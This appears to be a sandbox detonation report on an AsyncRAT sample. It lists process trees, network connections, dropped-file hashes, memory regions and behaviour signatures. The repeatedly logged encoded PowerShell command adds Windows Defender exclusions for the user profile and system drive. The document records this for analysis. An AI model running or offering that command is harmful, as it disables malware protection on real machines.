"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| N/A | 10.0.2.15:9090 | tcp | |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| N/A | 10.0.2.15:9090 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| N/A | 10.0.2.15:9090 | tcp | |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa | udp |
| N/A | 239.255.255.250:3702 | udp | |
| US | 52.111.227.11:443 | tcp | |
| US | 8.8.8.8:53 | 225.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.189.21.2.in-addr.arpa | udp |
| US | 147.185.221.19:52033 | tcp | |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
| MD5 | b8ccfc163e2d56a73b6fd7387a45e6eb |
| SHA1 | f81a368c275574fa808a92d29c5e0b37e01162ce |
| SHA256 | 8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84 |
| SHA512 | 8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf |
memory/2280-11-0x0000000000740000-0x0000000000758000-memory.dmp
memory/3732-13-0x0000000005040000-0x0000000005076000-memory.dmp
memory/3732-15-0x0000000005780000-0x0000000005DA8000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
memory/3732-17-0x0000000005560000-0x0000000005582000-memory.dmp
memory/2820-19-0x0000000004FE0000-0x0000000005046000-memory.dmp
memory/3732-18-0x0000000005E60000-0x0000000005EC6000-memory.dmp
memory/3732-20-0x0000000006040000-0x0000000006394000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1kgkasq.c02.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3732-50-0x0000000006600000-0x000000000661E000-memory.dmp
memory/3732-51-0x0000000006B70000-0x0000000006BBC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MAIN.exe.log
| MD5 | baf55b95da4a601229647f25dad12878 |
| SHA1 | abc16954ebfd213733c4493fc1910164d825cac8 |
| SHA256 | ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924 |
| SHA512 | 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545 |
memory/3732-79-0x0000000070700000-0x000000007074C000-memory.dmp
memory/3732-78-0x0000000006AD0000-0x0000000006B02000-memory.dmp
memory/3732-89-0x0000000006AB0000-0x0000000006ACE000-memory.dmp
memory/3732-99-0x00000000077F0000-0x0000000007893000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat
| MD5 | 3e05d4bfd657616e447d2061c92a339e |
| SHA1 | 8c4fe7300b105e047f256083c181ca1648ff4a84 |
| SHA256 | 298a1e490112604bd21212e5fb9e0110bb14c861b59f68656d878d14f3ab9ffb |
| SHA512 | 54270b4ed6c69a2a4dc1e18c3df8f3e56e922e7c97354283607b2e012f4b3bb07dff0c9b9bccbf3e9601895d82708d86eff907d5da9f6ab0bb7fb1c2dcb245ba |
memory/2820-101-0x0000000070700000-0x000000007074C000-memory.dmp
memory/3732-111-0x0000000007FE0000-0x000000000865A000-memory.dmp
memory/3732-112-0x0000000006C00000-0x0000000006C1A000-memory.dmp
memory/3732-114-0x0000000007990000-0x000000000799A000-memory.dmp
memory/4788-115-0x0000000070700000-0x000000007074C000-memory.dmp
memory/3732-135-0x0000000007BB0000-0x0000000007C46000-memory.dmp
memory/3732-136-0x0000000007B20000-0x0000000007B31000-memory.dmp
memory/5000-147-0x0000000070700000-0x000000007074C000-memory.dmp
memory/4832-157-0x0000000070700000-0x000000007074C000-memory.dmp
memory/3732-177-0x0000000007B60000-0x0000000007B6E000-memory.dmp
memory/2820-178-0x0000000007410000-0x0000000007424000-memory.dmp
memory/3732-180-0x0000000007C50000-0x0000000007C6A000-memory.dmp
memory/3732-181-0x0000000007BA0000-0x0000000007BA8000-memory.dmp
memory/2864-195-0x0000000070700000-0x000000007074C000-memory.dmp
memory/4412-215-0x0000000070700000-0x000000007074C000-memory.dmp
memory/388-245-0x0000000070700000-0x000000007074C000-memory.dmp
memory/4596-266-0x0000000070700000-0x000000007074C000-memory.dmp
memory/2496-295-0x0000000070700000-0x000000007074C000-memory.dmp
memory/4040-306-0x0000000070700000-0x000000007074C000-memory.dmp
memory/5048-337-0x0000000070700000-0x000000007074C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
memory/2152-358-0x0000000070700000-0x000000007074C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 347ce576af1cd27fb64dc9dfe3646769 |
| SHA1 | 3e5d4569f825c425180329154a3cc6355dbd3b18 |
| SHA256 | 698adb374c4d6dd53b82167dafbe24443b0ac86674e51049e57147d535fb56a7 |
| SHA512 | b1f96c27f4c2fff33bd9ef65c4b2a779ad0192527a3cdb2e28b2fe9176aa4b6d57cebc3662f4c3b82ed3b46c2178f0c591036be1e883f4cdff8d44b16585fdbf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b72e09c578d326a4869a6267fa375140 |
| SHA1 | ba87058e3d5b244d012a76297bc98107015e7a58 |
| SHA256 | 3e02d16e7e561520c8ff36de504bd56ba5493f8ada95322e40430c7f5237e458 |
| SHA512 | 30f2b84001d02e11e6f9d2e515a40ebe7d26a3811937fbfe1b72226a759cbf61fb8c72ec0cbc1295313f0b8fab8d499344c42979a7b7000cab0ad2198ca15463 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9a52c354e555bb6ab2bc528a52f364c4 |
| SHA1 | 04f0a60a285cce4efac88dc7833c375018f4161e |
| SHA256 | 3af66224242bd49cba61632a2b02bfc9dffcb459af99f59dd2a98735b77c6dda |
| SHA512 | 59e6a4fc993127ab38cc0f39d53ed938939622292b4f126e188ca9a501ef16f1e69e80b24c65d5ec7b90c388397c92ad67248b83a22b5fe3de58b4c08a1af101 |
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json
| MD5 | e516a60bc980095e8d156b1a99ab5eee |
| SHA1 | 238e243ffc12d4e012fd020c9822703109b987f6 |
| SHA256 | 543796a1b343b4ebc0285d89cb8eb70667ac7b513da37495e38003704e9d88d7 |
| SHA512 | 9b51e99ba20e9da56d1acc24a1cf9f9c9dbdeb742bec034e0ff2bc179a60f4aff249f40344f9ddd43229dcdefa1041940f65afb336d46c175ffeff725c638d58 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VLW1SL5J\update100[1].xml
| MD5 | 53244e542ddf6d280a2b03e28f0646b7 |
| SHA1 | d9925f810a95880c92974549deead18d56f19c37 |
| SHA256 | 36a6bd38a8a6f5a75b73caffae5ae66dfabcaefd83da65b493fa881ea8a64e7d |
| SHA512 | 4aa71d92ea2c46df86565d97aac75395371d3e17877ab252a297b84dca2ab251d50aaffc62eab9961f0df48de6f12be04a1f4a2cbde75b9ae7bcce6eb5450c62 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 07:20
Reported
2024-06-03 07:24
Platform
win7-20240221-en
Max time kernel
150s
Max time network
141s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3044 -s 564
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2456 -s 564
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
